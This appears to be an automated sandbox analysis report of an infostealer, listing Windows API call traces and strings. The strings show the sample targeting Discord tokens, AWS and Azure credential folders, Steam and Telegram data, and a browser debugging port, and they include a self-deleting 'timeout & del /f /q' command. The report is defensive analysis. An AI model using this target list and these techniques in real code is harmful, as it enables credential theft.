                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411C00: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041552D,?,?,?), ref: 00411C0B
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,dQw4w9WgXcQ,?,?,?), ref: 00415535
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0041568B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407790: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 004077CF
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0042150A), ref: 00415659
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,-0000000C), ref: 0041566B
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00421509), ref: 00415679
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$AllocFileLocal$FreeGloballstrcpylstrlenmemset$AttributesCloseCreateFolderHandlePathReadSize
                                                                                                                                                                                                                                                                                      • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                                      • API String ID: 3817223191-2067953968
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                      • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 004166DE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 004166ED
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 00416794
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 004167A3
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001C), ref: 0041684A
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416859
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$memset$memcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: JB$\.IdentityService\$\.aws\$\.azure\
                                                                                                                                                                                                                                                                                      • API String ID: 3008122021-3834632163
                                                                                                                                                                                                                                                                                      • Opcode ID: 2a85a19b0b99fdcf43dd7720755f3efa47ca591d87611c61b5666c6d5bbdeba6
                                                                                                                                                                                                                                                                                      • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a85a19b0b99fdcf43dd7720755f3efa47ca591d87611c61b5666c6d5bbdeba6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                      • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\discord\,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415C48
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415C68
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415C7F
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415C8D
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Local Storage\leveldb\CURRENT), ref: 00415C99
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415CA3
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Local Storage\leveldb), ref: 00415CAF
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                        • Part of subcall function 00415700: strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$FileHeaplstrcpystrlen$AllocAttributesFindFirstFolderPathProcessmemcmpwsprintf
                                                                                                                                                                                                                                                                                      • String ID: \Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                      • API String ID: 1512132791-1179288657
                                                                                                                                                                                                                                                                                      • Opcode ID: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                      • Instruction ID: db52eabd1130b4015811ae594007c4c182e7f7f0e4775522e0b09ec713fe86e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D41A471900619ABC710EB719C86DEEB36CBF88348F40454AF64666052DB7CF6C58BA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: https
                                                                                                                                                                                                                                                                                      • API String ID: 2507841554-1056335270
                                                                                                                                                                                                                                                                                      • Opcode ID: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                      • Instruction ID: e26aa42ddcce7a9dc6db16cb5d707b66fd772de428dd0f6f7d264c55934dbf87
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9041E9719002199BDB10EFB0DD85BEE77B9EF84348F004029F901A7191DB78A98AC7E9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418444
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041854E
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00418584
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$memset$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: %dx%d$DISPLAY
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcatmemcmpstrlen$CloseFileFindFirstOpenQueryValuelstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: Software\Valve\Steam$SteamPath$\config\
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404EA0: InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
                                                                                                                                                                                                                                                                                        • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
                                                                                                                                                                                                                                                                                        • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,76EC5E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406C44
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$lstrcat$??3@InternetOpenmemchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                                      • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                      • API String ID: 2141826376-2676143373
                                                                                                                                                                                                                                                                                      • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                      • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001A,?,00000104), ref: 00416367
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Telegram Desktop\), ref: 00416376
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcatmemcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$C:\ProgramData\$Soft$\Telegram Desktop\
                                                                                                                                                                                                                                                                                      • API String ID: 2540414856-1297282028
                                                                                                                                                                                                                                                                                      • Opcode ID: ce9cec25618399da20032b62709044c55674dbe8e7e8a6d5c3bdf33b24c8f7cb
                                                                                                                                                                                                                                                                                      • Instruction ID: 64e18173e81040c63563a2c948d1254a8cd49f8bd4ee544822172e8b9e7dfe6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9cec25618399da20032b62709044c55674dbe8e7e8a6d5c3bdf33b24c8f7cb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09B19571810B4EA7DB00EF75C9858D9B768BF69308F40924AFD0952502EB78F6E8CBD4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
